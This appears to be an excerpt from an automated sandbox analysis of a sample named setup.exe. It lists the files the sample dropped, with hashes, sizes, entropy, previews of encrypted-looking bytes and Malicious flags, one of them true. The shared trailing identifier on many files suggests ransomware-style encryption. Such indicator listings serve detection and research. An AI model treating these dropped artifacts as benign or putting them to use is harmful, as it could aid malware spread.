              MD5:30F21E11C01AB079BC2A40697CC30C1A
              SHA1:13CA0F255204102620D5A744F467848E2377A017
              SHA-256:47322BA9CD1F4E175C968C24D77F6AD81BE9027F877FB162151C58D136C4615E
              SHA-512:02D388E09D5F0BCC2A00C3FBA63AF930D22BC532BC206796B95EABCA9ACE631CE636770FD150FE9EDD4ED350692D3B99951B58D39C670041B42BB9DCCE51CA6F
              Malicious:false
              Preview:{.. P.#E|....N g.p..f..$......C....j.].4..:........0.g`..#.2f.b....fM-O.....l....k-..3........5.I.i.W...O.u..-...&.3K]<./.....rO.....M..$.;..1.f.>..z.~.7.'.X..A3.dJd.;..#.&P...c.7.j...w.$..r..Y\.'.....y/...Ud..Y}e..u.<...G..\.7.1_..r.....0{'eW(c*7.5W...6%.......g......<[....".Rt....$|;c........c+.u.....L..,.5S@.k......!.o...dA.q..........4....;.[.v...xVi..>.+H.3...8R.p.....~.w'#.......0WU..`...<.y...]/k. 8..NG..lU..#+L..h.V.k_.H.*V....w..7.7.R..C..i..n.<...F`.&."k..Z.....I 1.k......c...,@?.......H...gf$.<..ny...c,..q.....3.q..It?Y.Y.5b.lo.xl...3.......E.pN.N..7.T..A.|.....H.........I...:B.g>....A..s....*..Ee.8..;.b.i...A6.....e...I..q......'...."......m.d...Z.!....+/<[..@s.P..3...k.N...#qn....s..(...C.....,o..J3Q.Z.!LBj]..;o.L.Q...Vh...<`a...p..}..l.*.gKzC...(.:..~c....~.R.............[tI.q](7Wv(.w._.(.+.O.O.t.N.%v:.,....ods.-.|Ry!.8Qv6!-.H.)>o...y..n.d...;.=..h.B?.%.%.....1...+.....x..Z....r....e...?......&w.ps..N)cg..... .t..7...<...\.f){..|..I.o.z...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):674
              Entropy (8bit):7.687407144503293
              Encrypted:false
              SSDEEP:12:kSyohSlb7LEYhCEem9hikKW+IgXblTWytmcICImHmxdQ5iqJYxFhQsMR2cii9a:nSlbksJRKWkXblTWytmc7ImHGQALpbD
              MD5:0330D02776930A0E8D5257A3E59AEDD0
              SHA1:ABC4C6AB74D2870F935EECBBF1480BF9E6DB3B7B
              SHA-256:4446CA699E6A17FD876E9A1BB3EE7C4A539D08BB587316BB8821FF9F10E8039F
              SHA-512:D8329C26F08EBF8EDD10FF8EEBD7EDF2C0A2780D03D2F207C5069F653D8473770D5E2609C0D755369F9625B6A2A07CE1ACAADE109685E462921635F263610EA4
              Malicious:false
              Preview:2023/....@#.{.,.B...wV..5.`.....^...08&R..........JiS.o.3./Z?..)...(t.uA.Jn....W'.c!m..O.U?...tG>..^G..'..T.!.....\.~.^.....2..k..>.f/..~.:..SL.%w..7..z.._V#.3.....I'..s......3.b.-.q..j.rfh..~..:....z.<(+........o.O.....:...$&......$Q.....k...v"}.f.NRr...?|...;/.M.rW.L.:.HD.n.T.o...l..q.7cxq.&R&.%.K........LG[.......t.*."|.+.pm....1!..%.#F(.;.3_......Z............R..Q....Y...-^...".gy..A|#.......2b......._..i*.p.d..W4r{......6.g./d.h6...8..1.yG...5Jj<...j..`$.EPc.v..X....z|.$1..]uf.....7b5..3>.|!&^c.....0.f..Y.s.;...p/..]R...XmT.2v..a....0.).3...?..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):452
              Entropy (8bit):7.450456688384212
              Encrypted:false
              SSDEEP:12:SPCTHmzeuUd2+bx/WLTOLkmYXsp7s1zjEpBFxzsMR2cii9a:6CTee3dNWLCfThs1zjEpDxYbD
              MD5:22C839953024A609EFDD66E2C942EF19
              SHA1:D5C7857815ABE42D1F90944C3EDF58E46AB91F0E
              SHA-256:51D43887A154A927C67470B3AF8DA79F27A3FA9570043095CAEF0F92BE316E68
              SHA-512:41B77A94BA6E89C6714B6D9644BC4814A6B6E6062E1510DE4E778EA102CF1C36877528191305C0AFC9A8FBFEBBD774F799E87838B561EE42DC883226CF433B76
              Malicious:false
              Preview:*...#.ZQ.kSzf..?/3.:..9.$7j.....Dho5|.2q..$....0|....j_6...<...v......#Hv......$. O.,r7/...c.......X.8gT...b@]"..e8cV+...n.N...N..q.~t...B..sR}O....r.vo5]\gZ9..v......u.o...../...KdS9....P.niPl.4%J..[5r.*D...z........)/%K.......0.....H$;.E...j.,.E0...=.@@....t...w.97..?..(f2.x....{....s.O..). ..$.k=..HeH.....e.@...V.q..x...{..,..n.|..d.h0.2.G!...1...dh..ivVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):380
              Entropy (8bit):7.38396927689163
              Encrypted:false
              SSDEEP:6:q3d5JGap2kn+pBLgReejKMYfqxPe7eauobV9ffuhosJqWsXkNR2cii96Z:qd5JbQgoIZjKMYyxPJy/uhoysMR2ciik
              MD5:9F51801EFC4FCEE198E3386FA62B9E2C
              SHA1:6EB73C2BBC70DE7F81B7D9F657B9E50F5780F96D
              SHA-256:3F1D38148CEF8C6AE59D16DB8D5497ACF9E427767DE316598FAC9D0AFC4B74FB
              SHA-512:C1BA8E48E0AAAB9B43D20F617433A032D4FDE234522D87D469B5375684013D93FD5AC7FCBE9C208CEC98E48635457E5DC92B444EB981CDF5185BBC77EA4F9C1E
              Malicious:false
              Preview:...n'..YM...K.lWpoI...|.._.......2.\X...9/./....|..v...Pz.c'.2...p.$b; 0...h....a....i..c.....PEng..*...&....y..1Z#p,J0..z..I.v...y.=..P -tq.'2......;..UE.......e-.1....nT.!............0}'o..B..:..kw0dT,...)..S.{.c...{0...To8t..f.6A~.|..^..m.%..1S?..I.PQ....g".8..........1.#l.E..q.DVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):666
              Entropy (8bit):7.63126694936505
              Encrypted:false
              SSDEEP:12:kB5MWd2WtbZfRs9/z4DlSd9U3APDhj3DxSaUePyfIwxiJsZmdDfHsMR2cii9a:U5MWd2WlZDS9Dhj3DgaUc0IwxosZmJ8X
              MD5:1955B921D093A79B67C677453D8A6519
              SHA1:0C78C78E7FE6B3F8B241D27B568656B53D7498D1
              SHA-256:08867F12BE351426AE5DBF6A9B8DB458F6B0BCD190361E07275FF7B398FDE2DE
              SHA-512:B05271ADE0CE2828BCA0500278C6A54EDC166495CB1F5609F32D0175BCFF200ABA4B8FE295DAE423769CC27BC778C976B3B4F48EBF8C13696BF9220B86401223
              Malicious:false
              Preview:2023/.xJ.wj.Y...9.J.!..s9......@7X..Ev=.L..(..q@Xa]%...V.W...(..)........I..>n..hp..H;...".+*.@=.!..(E...#'E.......8.;th..%....._KJ..sy.~..$.....2&.38`=..[b.1.....9....%.'...W.Nl...c.L.;_..r.}k.[?..{6..MA...r.84.......RvB9Y.|`D0..iv..6...X&...q..fE.Q.jg.X.i...N......T....8....$7.M.....u.@F..u..Y.7k.V......>.].[.4.|~........+......],.J9...m..t2;...U...?.gJ%N." `...L7..Pc.IF8-..yhi.._..a.F.....E...S.Rrx3....g.>.n....?.....v.J.P&.!../..wEKf&.D?................%(.z'..$.....]....xS..*.C...-g5>tv.........8C......!..N..P.Q..~W....~ X.g....)....GVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):850
              Entropy (8bit):7.74278848395032
              Encrypted:false
              SSDEEP:24:Dsk/wWMupRKQWXj5aQxwzI6NFd6RfzSLp3/EcMA4YcDJR8IhbD:rMupMZXFaqaI8Fd6QL1LMA4XJRvxD
              MD5:2F47B682BD2148B0086A87CA0FE9BD22
              SHA1:A431C208FDD1C6F53E8B8BAB5D71462DF65099EE
              SHA-256:003A6ACC2F40F8FD923E845F9126656C8B6E9D6D07E19C93EE51D935DE5EEC26
              SHA-512:C96D7A21C3624FD2217B9ABF3260E9C88C9DEB5B91F4CBEAC87147A8ADCF567CE0F23DAAAFCB0A7D19754361851D372B627BD8675B188DA0692C4D42658E51AE
              Malicious:false
              Preview:A..r..R.8.z.1.....l.X..x.........5.....pIk.f.......S.^..L...+.N.Z..... .J..L..|.3N>a.h..[..& ....Rj....Y.'...g#E.4.+_\.eaR...lqx......Q.]..5..V.FN.@_/.E.{.Dc.....E..'.qB-g..>.^..\n..P......u..h...C.e.G..,.....<3..F...$1}....s.iu.jW.......-.@$...#..Og=..b.q.E........SI..>t.O ...z..b3.O..?>..z.4.; N..N.1.[.]./.......&..........HO'z;.B.4..$./..4~Ro^....!7..2;!.7.....V.e.B.|Kz..4.F.P..O...........b..r...R.t....fr.....[.*.o....@.3..j....R...<..........8O.n....eWeB....N-#...#:t7..:.e.t...a...,).e.._|..A...........g....#..Jv.P........(&V.9w..&>..u...Q.0....dU..a....TO..P.......,X.(....5P.,.L..y.EO.....u.............(...uC.FW0~9.>..}s_=.D>.....%.P../..d..gP#...1..x.y..%.:;W..._...aO.k.....&^...........}.c.?Afw.h...... .... ..I+.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):662
              Entropy (8bit):7.6633022339768075
              Encrypted:false
              SSDEEP:12:kJg9+oP3O7b8uJN8P01x/SbRWcQlZjoFc7a0FZsOENxUWpjJMQsMR2cii9a:e9ovOlvGuabwlva0ADNuWpgbD
              MD5:3094C4A4A569CDF436B1FC20CB8F2100
              SHA1:8ADE7CB312F222A7368B3FF5AD227C5DEFEC691E
              SHA-256:D340284F30BA94D8C0A3CDC99319FC9FCE1BC3C7ABB46297ED82BBA56A618260
              SHA-512:E7DF3FD399DE6C3A43EF8BC5849671E40CB713EB1E5AEFA8180477D2AD002250BAA2A0809F696D8E1FD512442856B53854E77C205053EB2B4C310EB5CCC77494
              Malicious:false
              Preview:2023/4....h.'.3..[.......C..0.rQ.x.KA..=........3E]...}...N.61..R,.QG..R..rY..Ho. .o<K.W..)<X8.....j.j.cD~.X.]...r..>..8_Z.c...n.......+.>..B...I.P8........L..o....7.D)..d...q+.*..p.\l...iC.Q.._u.)........bf..fIf.p.D.c...W..Dj..X.E....!.(+....y99.vu^Q...%...0.?..\..M.$:.]~].S..Ch5.I.&..9J........D...I.S...6.....d...q..l..f.Qvdk..."..3.. al..x.AI...[._0^.D.8.M...J.!5v.o^..$.........@...a...`~.E.N.., ..M.U....|.T+I...$G......0....'...|9..j..+..gq.?..hv..L..|..............l.f.5.B.t....4.o:.A..........k......xr..x..H.....g8..:.#..z..2.[.^.(P......k.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1116
              Entropy (8bit):7.817342178291443
              Encrypted:false
              SSDEEP:24:GXhxhXRXM+R7gd/l9HhEaeU0nl/9F048GmH1eeTbD:WTpR8I7fU8lFMD
              MD5:F3152A5A1BE381E341286EAD6A47B013
              SHA1:D2CD34B2111D48A5892338ED347F2D20CB01B3C1
              SHA-256:670AF7ABF76DF8BB2DC601E768212343860EB68A7478F41F1AF4DE36DEC7753D
              SHA-512:8C2B80EE45FC657FFDF535872DCE949CD6F528A71A07BA1C7BE1168C3F755C677812F89D2410C3EBE2A582A9F0103D906B6C4A40D0F5C8041584B8BFF84532F8
              Malicious:false
              Preview:.h.6.%...\.].U-.=....z..2..9. ..$...KW.....-..@...P.....9.........n..?..Y..M.h1A...F......a:.Q..+KQ.c.u.@.'....?.\...."I.^.h......#..0.{....>%..c...,....).v....B../....1..d...I.`....v..`..DJAF..&. ..Sv'!....%.(....>w.9X.!Of..u.,L...z...S......jJ0.yC...S07.8MSq.......Ys6...y..|.VY.<.Z.~.......>&<#.I..........R.A7..E.N..U....:..?f.{7#*..p-.#...2.by.l..m...u..:.5....Dqd...o..%..u..`9+.U..O...-s{...f._h....?.lb.^0.*.....Ox{."...7.$D...ID...\.....G..,.mW1.......e..fH..x._r2..b.1..0..).......9....z.R.{..k3.J.Z3..u.$.<...H.U.K.a.O%...5....7.0.a"M..F.......N..3."..e.J..dtu^].l[..%P...,q'ZW_ah.PZ..........Y.}O..a......9..4..bH..{F2..J..IW..`.@.[.Au..5E2&j...%'m*.w.....Z.....e...Qp~..SK......0..Qn.E...d.!.2...&..f.[...,u>......V0%s.o.....e.%R.......>.'.$..N.....;..(.-.....H.h.....(......9..[.......Y..... .<..7p.Tp.rl>...-)m.o7.mW\N.:F........Z.w...,...2H...5Fub...b...s...D..Vm^<.9u).q.r+..a..m.l.un...q....19.+....M.S..3T7..;h..uFF..h.....9.d5]..T..,n.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):680
              Entropy (8bit):7.693044298551984
              Encrypted:false
              SSDEEP:12:kA8d7/q+E6i8wUXX/BiNm3G1fmmG+dSVhPHdCRNAQTjYOByhnJsMR2cii9a:5shdwevBCm3G1jYVh/d8N/AobD
              MD5:3817FD17B4BE31E286095621750AE05C
              SHA1:DD07CF19819DCA40546CAA5A73C4CEE4A9C24765
              SHA-256:AE198DE2AD86990F6E963B8067BAD6955F751572BA7420B927DBFA9252C1DE2A
              SHA-512:479BC84FAF65E2A310C21BD63668ED6536039DBCAC041B71E2337732CD844AC16449365838438AD7FF5B0F9E907FAC20094864D496B887CF51394C7A519764D2
              Malicious:false
              Preview:2023/.:J..F.8g1......k.'4....Y.c.[%...`<[.'X......S.....?^>....Lv...?....\F.....~A..E..nU..F}Y...D'.;..:!....6.e.t>../A....T}C..4,E..._Z9J`...s.y]>.;.l.q...j..`m...ms...x..."...4.rQ..I..:.ph~...>.7F...........".q../.CPb...)...S\b...wGr.+U-...4...Xm.K8*..?....B..BE.7..^2M.V).s.......O1..w...o-2..(.!xR...Oa........P..1...7.M..x..q.6.>G.M...O..../~..!H...M.b##'..u..E..e....]^w......:...y!.Q.U........=..K.LL...qWN.........{......|.)..z.^T.i.i...Z.t...mn.6...U.y....<.*1...,..t}B.cN..Ys..u.V..).V..D.U\...;.".....l.....c{:..Y$....i..d ..U..,.../}./.07.:....w.!..(<....*+..HZu..@...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):80530
              Entropy (8bit):7.997791648213265
              Encrypted:true
              SSDEEP:1536:Jd2rfeR8MIS6Rth8uIWrhCl6/+8oM0IhWbP05ijnIiRnGz8KpKjizHpOS:Jd2rfeSFlCqlx9hWbconhYzKjmHpOS
              MD5:8C698DF8211C5645BD2349E5F26C9C7B
              SHA1:93F6366213B04F078682BEB4FEDC16B5A0872CC5
              SHA-256:E27319D2FFB1AB091A5CB7FF8DC3A569F003FDD9880F71EDE9F63A1F9FBF84C0
              SHA-512:87DD9CFFDD7D8AAD77A4D38BC597DBB1FC473B26DCD1938D1F618E30AF1DE1B3445C3AAF1ACAEABD5EBF08B124FE7A430A248398146EEAF2E5515E8BCE1C0617
              Malicious:true
              Preview:ewogI.2..`..x^..T.......W.}...[..\......4..A.}B{.&.....7.2.....-.d?.d...........=..=...,n....{...B.e.d-....at..t.s[.Q...}.+Bq.gh.7+&.!#.7..9.....(....>D}..}...4..8.`.............D......28.......eOK.8..z[.(.g#J\..K....lc|...S......"PQ...(P..l...u.$.Z.....|.~..g....ZM..x..*-....A...1.....8.....,k..|..A)NTF'....e.zLwL..,..K..5.5.....\.2q.=7`.e..$x..........S...V...T...FC..r5......d....S.K...7^A...........fQk....L.......x.f..?....&o...k..rdm...>H.@,R.`W.L..^.ct./t,....>75...(...sm....2Ee}....1?.....Q...A....5H...+@.0)..r.......(.W...RZlU.h.....>\...f.y.O.t.c:8Znp....&......`.....@;.=.d.A....`.y.+}G6m1..$B.G.`.{...cvv.{n..&.q.X..GY9..v........5|p.l."&..;..9.IJ...c.0.A)!...:1.P/.8t........./(Zy}.o..v......w]..y........._LO.....7?..~|...p|..N.4.=.\o.J.(j....dW....3@.<..(.|./.I'|._i.q..0U..da.U.,.fW"...C$M..+8#.A%_........&..[......O..Si.r"..}.X.p..F.'......X..Ew.....6..Y...-..<...j.sVk........\.x/l)h...W.F3..QU..4U;.'.h.....vy..O.@.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):11901
              Entropy (8bit):7.985292095306378
              Encrypted:false
              SSDEEP:192:sDFqe/hFfht7hozca/ENgS1pJzjRmZruFqSrWpa51hdM986oqrBat1VRnep:sDDHi/EgYrgZrqSZNJi1vM
              MD5:8EDFC0B954FC4853038D5FC6D4640A59
              SHA1:1C0505EDC4CF77DF462A35F794EFCE291111735D
              SHA-256:5D99D1B553841F2AFB88EDC7970FE0CC639237DEAA8123A6CB8ADBEC4113194A
              SHA-512:AC6BC0250C309104FF9A516FF2DCB68A891DCE8E9563750FB429D4AF805D2EA94EC6B9244652596A7515850E547A9A5972B58E83621347B5210C0D8BACACCDEB
              Malicious:false
              Preview:(()=>.X.9.c}.........r...P.....Nm..]<....:o,a....!u.....:.w.u..q..\.g..O.l9Z...}.f....0..1*zx..^$...7..,:.. ...../...(......P.A.....{...+..2)......@.L'..R.t.I..q!....F...sf...C.!(......P!..>q...%1s.l&[o......B.c..|....X*....n../7.,.+dI..7..4..x..r...~R.<.N9v..w.%5...2....-.....D.L..H^...>.............(.@..L.`.#..w{........zG...t..m.R.F'.t^.......\P.z%7hq..}.N]x.f...=.9.#.C...(.Y..F[-..,.|P.n[C+/.D.p..{^...j.13....).p....f..{.....U.........{..(F....jr.{...e7..8....'.."........zc3.6YV.....>|.*...oEM...A...v.VhZR5V..7.:5..'%.[|...G...Gd..v..W...Qyc..X.4..`.T...q...|0..-G.d_..p....^....s..@./...:....M.oP.r..Z. Gx3..28./..z`<8.N.Y......4W.E....5....&.f......2..Y..Y..-..DMhT....D.;d...Nu..1....u.W..(...I.J.*..Je...Y..`q...Y4.V.c..g..?..F.<..3..Q..;S*.^....5..!W..6r.j..~b.v...a.b.c...f.`V8....p......Jf.^{...4.o..M..*q..Q..8...K.g......{.....<]...U..D.Z.<..5..A....A.../C...7.r.g....Y.r=....0y.....K....;.P..cSdr.m....{=.....r......H..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.342805325243135
              Encrypted:false
              SSDEEP:6:SUbQoShsyt4Fe1mht6sXIyD2k10NGyQJv+XbeZhO1OWNYXWsXkNR2cii96Z:bnZg1nvuHJv+Xye1XKGsMR2cii9a
              MD5:B9103DF766E9AB5C882399C5E0916D2C
              SHA1:6B91D3343E9825E417941D5A253511A83E087DCC
              SHA-256:7D4165C6E73C21E85E74269D245052DDA73E5E8D7DFA74A35DD90457C01F7317
              SHA-512:0AF7D57937C87ADBEBC19D251A33E77C0176B824CAA223FE368A46A3E74ED05F99D859F94A9D09EEBCE41FB6FBC2073662C6160E0588EB96ED4D8D314CE84FA5
              Malicious:false
              Preview:1.1B2=....(Z.%|.eu...ev&..f.=.x'.BXZf.n=..#...K..7z.4....Z2?..m.>VFU.e["./...E3H.Q...gP"....<\.....t..#.=.m..rm...N.....%.;]\L@.,"&LY.2.n.l7........b~-...BL..N.....(.........[X..+.=U..%D...>$p 9.~NHf...e.W*'W".S...............\....A[WR)...'.'...$f....5..8.^..-..z.{...L...^|.w.I.<..M.!..$.._...f.}j*.8E(j..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):450
              Entropy (8bit):7.4927662981786085
              Encrypted:false
              SSDEEP:12:M8GoWuH2Xn5HXhc1EyNaxbX9kzeSxo2rfksMR2cii9a:MJuHihXh0Naxr9SRxo2hbD
              MD5:A4FABDE53A27E8BB6B81D197119A8A53
              SHA1:D1ADA6177DEDFCB0E32C81D0C26697971BC97E89
              SHA-256:0B99B4BFA1DD8AE3F3293ECF34A8270D30A037AE3CCAF8318AE77F1C9A659915
              SHA-512:6EDC8AC53A14DCFABA44ACEA3B5439D9957E76D325B4F3F5FAEEBBF0981FFF736E67EDBAD9771D52DFCE551798B514BE57AC1D5209FC4853B046FFC653EA9B42
              Malicious:false
              Preview:.{.N-x."..>.;..A.%./...r..zd...4n.Kx.>..0.?&..Oxw...nc.z........c;..8....UvZ_..u.S..f.:..$....*.D.G.....o..yV.....L.bD.v..Yz$.y..8!.~.wk...F[.!....G...XRa..'>Qf..;5j].3.S.i..%..A.....?.!..=..u..(.....>.%5.lx.o.Z..u_lN..7....7.I..o...R..c6+.....r.k..e.IM~.)m.L..b~..Gz.:O......Q....%<s..%.7t..?....yh...r.V@..d....#...@8.B..Y.f.=.@ja4...m...,....OK..4..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1179282
              Entropy (8bit):6.2608776887672155
              Encrypted:false
              SSDEEP:12288:wgdkhr8htqIeEoKK856sJmOBjn2LT8/XH6rewfkb3J0sI7:w38htfeCcamOB6LT8/bR3esI7
              MD5:CA58DD5813BA86AAEE97F171ECBB4AC4
              SHA1:59F07504864151022D84FFD1CFB0EFE136BB65AD
              SHA-256:8C1DF7D82117C57FFDBC9644DD39E9B2AEDF9C8C583C92BB248180A513C4DB70
              SHA-512:0A61420F28499FF98EF9DF713584BB8A93DB24FDD02E6A47E6F9A72169E796862F98A5D71399103CF665C8A16A87F8CE3CCEBC6FB3D6D9CD70F6BB3EE56227C0
              Malicious:false
              Preview:/*! F...VS.B..F.....(.j...$.....Gz.'...HO..e.l..KTP.....=.......g.r[.z{HY...p.[...{.3.j......'`_.9.......v...w.0....I.oo.r...A:S.j2h...O.`.I7...h.t..E.............I50%.E.t..U.5...Q...../b.dLh..NA....C"h,..6=`Y.u}R...g..^.".".x..\.z.O.........@i]..2~)0.l.(.RZ.6CW.I(!..f.9.b.a.H.....r7c.>..I.....a...U3..'.....U..N.O.e.}..*...~....iP........{..A...E.f...:.........`.!..i(R_.9GQ.. C......H.i..5..*../UA.\K.7..=..Vhxv..*...b.}OV...w..-.&........7.?....{V.....:..}..W.a..c....-f{..X........FHW.E....e..gw.Y.D.c......c.2XE..1...R..4...Sm..^.....G.H.......?>}].2..U>.:!...J..fcI......N<7.X6..&..j.b~B........z..%.-...8u25.....8..Me......o..& IR.Y.#.F1.qu....7.D.>ek......`..;...... \.G.. ....R.*T.....r...$hk&..[......50...F7.....r`.......Y.../...s].....d.....6.... .-.Z...'T..M>...8B.4.......r.l....]$..!.|..}..7..i..A......`..:..."..k^,.i.M....&.....$........tI.W.m....h.*..........-tse.B.\..6g.......;`......;.....a.,...yE...j.n...B$b..S:.P.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1010732
              Entropy (8bit):6.35874186288691
              Encrypted:false
              SSDEEP:12288:i+Qo4wATQctR6E4fOtwEL9X2Y+zWZdnwijDWwMxdf6kY:iRdwMQyRcOZRmY+zWZWijDWF6f
              MD5:10EDED28650E12ED18F7E8B75A358056
              SHA1:5A0B4247A520FF5920683076E2E1984286399B1C
              SHA-256:2ECBF875438204D5866509B35BECC0A4B3CBA56E84A43AF2FB164291546ABB7A
              SHA-512:948C2FECEB7CC4C5A0FFCA8CEE31E2CE4B5405F2D740E4C22C1987463FC9C5C1BE2F3EA50E071199C15F7B992E9ECD2A4E0637755C842BA089DFDC1CF4F2C941
              Malicious:false
              Preview:/*! F..q4..+F....S>.......UI'./.W.v.S.y....X..Y.D..D.....o.a+%.g.....x.......3.:.Z6z..T.38..%...eh...;.k..&K...8.Ip..#..d...t..m_.C.@..).'W..g.jB....L./9......0.dp.|..Y..........q.T..0.%.I...;....h8.7'..Z.^.\.eG....P.;.O./..^"dr.......V(.>..;..w.k6\....&..t.................K.........B(-f.mD$..~`._@?q.u|_.......zD..aC.%>..-..n..S..`Oh...4}........m......;.9^.k.Y.ZV.I....T...>...+.d.1p...(......O.....!.Z..YY..1...,.....5....W.....Yy.....n.c).....K$V...d/..G..M...;....O...........S.r..5...(18d...Uf........aj..].8.(..@r.&6.d.^.>h.H.Q.....]....j^...o.].\......W.h.I..D.E...v.2.z3..&Hp.....>1nF.i.YK...%H.j(zy:..l..\.R".=Fz.k..u..Q...h....-.u...(...a..L...0)....D..(......iZ4R.#V[....~......V..=....'..........!....v.+G...7>...<`..q..O.LI..s#8......k1.(.!8.c..|.v.6...|'...5.".....b(...! 8$).?".8....7S..N.k........<..<..v].y....;'.....h.OE..........0.......2..O.._.^a..v..-u3...._Sk.....W....`Z.>.Q..p.4..[..6.B..}W.&qN_...._..+.A..M.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1042237
              Entropy (8bit):6.33780356758587
              Encrypted:false
              SSDEEP:12288:ArcfH+tP3d9Fr9QLhbGoHVMunRZm91a9I2SFn4aW:Arc2tP3dmt6oH2SZm91jFc
              MD5:0FDDE51642E0686107DBABB037D5BF67
              SHA1:073E33834FA404001CFD463C5EC233AB2A205DBD
              SHA-256:C812172B9062699D9D0D5062A2ED388591BAFCD86AA9D56974071D6DA8E37E4F
              SHA-512:4CA2646D0324686B46600485922D4561ACB4777C73DA2F7D4BD6A7B3CD95DA809EB360EA21774180488A2B1EFB8F736A6A033307F655519F32265AE4413A810E
              Malicious:false
              Preview:/*! F).C.).9.....I.s. ...i...v}3.....l.oz..-A.e..c.x].. `.....m}>.U.b.E.=.8S..|.t..Y..6^8...>.b>y%.4J..AF..0.Pe.6..P._....[.`...)..vb..&.0.tF..OQK.p..`.3..6.4+..?........}...h`.`....u(..^...2jo......p[...t...Fy(h.2j...?.}...]W..-....>..x....u.z.+.vJ...Fo.xwO.....,..k./2....3...?.k....~..|./.Z.N.'D....g..[W.....[........]C......Y%.z...E..7.K,l..Mam.+../....C_.~>8?....V..3.CO2...Hl.....\..j....Z.D.j.p......&q._.1......P..N>.?(...2......R.UX...C.k)...qA.>u..(r..C....jz.R.+.1".....*..R.....K.8..q.......9.....t.s,ns).P.....?c.=kS...;.0....T.n...P..".g.*......../!............. .w....7...W.l.o.'..z."ND..T\...L)..T.3U&.%.7.hS..d..U....s.r.O.}u..j....:.T.c...v.9....-...3...3..f.vnZ.N.L]..F..C..A...V.yG.Y...nrs.}.........`..w.$0@...!w.(..n......=..~..D....NW{.i1....>C.xc...1.P5':d..E..8:.4..Y...OQ....KX...A../....3.^....r.d....--B.Q. .....a.....dG......i.J....h.>..~dQ......m.Qd.R.@....d.....xQ0...r.......P+...g1..r...F..8.:E0..\L...C.......V..=..pM
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1892
              Entropy (8bit):7.8946065814843385
              Encrypted:false
              SSDEEP:48:fPUraUvxlMSO1mKmd6l2y7E2dNnnN/B/tQCD:EOkl52u123NFf
              MD5:FE6FE5F3F9D976131BCD52D1FC758F4F
              SHA1:3D41378D6EEB1D55497F65BCAF58C4F7F1A448F5
              SHA-256:A1CF72BC3498369FCF1C98001CD40F953AFBAA7B5E964C342C3F08BFFD99AE31
              SHA-512:764AE99D54F954EC946AE375D361978A57809FA72D5C55F6B4AB2C400FAB2D185EE514AA0D7371C621210B2BC3189B0665583B459E08258B3A3E472A59E720CB
              Malicious:false
              Preview:<!doc'.v"O.N..C...E.M..Td..h..G..g..)#.......*.g|...6:.x..z)~.saK..E8..<.....a..zb.....)....\0..E...N....|dc.f..jG.i...J.......D.#_..j...A.v^F......5..d....Z....s..J...:.\*B..R|._2...O..c......4D.nC......#D...h.....6.....OF.......3o]B9.F&B+...|.......^..C.$Z.n...,.q@).v...f-.biF3G8(>..+.e..>...t.:X....UEOe..N&..]h(.....(..~.....wp..Wy.7.|....{i...J....g..:....(..d..=ao:.8G@z...Gi...z|.k.w.+.fQw..j.5...8..a....(.../$..).vn.)..<6b.2.x%.'..d>m+......6..bF..o.......`.:<.`....p.=..e.A.......?......<.R............y...w.a.M.|..!x..A....U....d~..a.^-..b..7q.i....l...4\..-...y...H...P..(.`D.z......|k....vr...X......].%?...._.....dB.[..4uk.f.cU...@.r.<|!\.X./.S...`..asT$.X9.X@.v2|r....!u..\....b<EX{(z=...Ia.....L..? ..(........ZE......... .s ...."...Y.0....u.....F.99......M...M.kk..Xv.......a....)....P5%....7N;....Y..]...o.w^.>..G#r....Z3.0...A....v....*....N..<J.B.....Y......h4.!|z...]...9~.~I..{....;pG.:7e..B....x...X*.(.......Z@....R......?..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):363249
              Entropy (8bit):7.124517327297014
              Encrypted:false
              SSDEEP:6144:O6zLWDTBfnsYer+LboOYUttKLV3MWf9FE5PdwGvPJvUcr2GL1:pL8Bfn5++PoOjaLV3M49OZqcrVx
              MD5:3CDD53FE8CC33267FEDAD3A74A1650A3
